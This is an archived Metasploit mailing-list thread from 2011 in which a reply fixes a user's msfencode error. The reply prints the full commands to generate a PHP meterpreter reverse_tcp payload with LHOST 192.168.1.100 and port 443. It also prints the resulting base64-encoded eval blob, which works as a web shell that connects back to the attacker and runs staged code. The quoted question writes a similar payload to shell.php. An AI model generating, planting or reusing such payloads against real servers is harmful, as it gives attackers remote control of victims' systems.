Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: msfencode error

From: Rob Fuller <mubix () room362 com>
Date: Wed, 27 Apr 2011 09:39:20 -0400
You need to specify an output method in msfpayload. 'R' or raw output
would be the method to use with php meterpreter, same as you specified
in msfencode:

./msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443
R | ./msfencode -e php/base64 -t raw
[*] php/base64 succeeded with size 1742 (iteration=1)

eval(base64_decode(Izw.chr(47).cGhwCgplcnJvcl9yZXBvcnRpbmcoMCk7CiMgVGhlIHBheWxvYWQgaGFuZGxlciBvdmVyd3JpdGVzIHRoaXMgd2l0aCB0aGUgY29ycmVjdCBMSE9TVCBiZWZvcmUgc2VuZGluZwojIGl0IHRvIHRoZSB2aWN0aW0uCiRpcCA9ICcxOTIuMTY4LjEuMTAwJzsKJHBvcnQgPSA0NDM7CmlmIChGQUxTRSAhPT0gc3RycG9zKCRpcCwgIjoiKSkgewoJIyBpcHY2IHJlcXVpcmVzIGJyYWNrZXRzIGFyb3VuZCB0aGUgYWRkcmVzcwoJJGlwID0gIlsiLiAkaXAgLiJdIjsKfQoKaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgewoJJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOwoJJHNfdHlwZSA9ICdzdHJlYW0nOwp9IGVsc2VpZiAoKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgewoJJHMgPSAkZigkaXAsICRwb3J0KTsKCSRzX3R5cGUgPSAnc3RyZWFtJzsKfSBlbHNlaWYgKCgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CgkkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsKCSRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOwoJaWYgKCEkcmVzKSB7IGRpZSgpOyB9Cgkkc190eXBlID0gJ3NvY2tldCc7Cn0gZWxzZSB7CglkaWUoJ25vIHNvY2tldCBm.dW5jcycpOwp9CmlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfQoKc3dpdGNoICgkc190eXBlKSB7IApjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsKY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7Cn0KaWYgKCEkbGVuKSB7CgkjIFdlIGZhaWxlZCBvbiB0aGUgbWFpbiBzb2NrZXQuICBUaGVyZSdzIG5vIHdheSB0byBjb250aW51ZSwgc28KCSMgYmFpbAoJZGllKCk7Cn0KJGEgPSB1bnBhY2soIk5sZW4iLCAkbGVuKTsKJGxlbiA9ICRhWydsZW4nXTsKCiRiID0gJyc7CndoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgewoJc3dpdGNoICgkc190eXBlKSB7IAoJY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOwoJY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOwoJfQp9CgojIFNldCB1cCB0aGUgc29ja2V0IGZvciB0aGUgbWFpbiBzdGFnZSB0byB1c2UuCiRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsKJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsKZXZhbCgkYik7CmRpZSgpOwo));



--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org



On Wed, Apr 27, 2011 at 9:21 AM, Ahmed Shawky <ahmed () isecur1ty org> wrote:

[root@localhost msf3]# msfpayload php/meterpreter/reverse_tcp
LHOST=192.168.1.8 LPORT=443 | msfencode -e php/base64 -t raw -o
/home/lnxg33k/Desktop/shell.php
[-] php/base64 failed: undefined method `chr' for nil:NilClass
[-] No encoders succeeded.

--

Ahmed Shawky El-Antry
Pen-tester, Programmer and System administrator
lnxg33k owner "http://lnxg33k.wordpress.com";
Isecur1ty team member"http://www.isecur1ty.org";
Twitter @lnxg33k

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: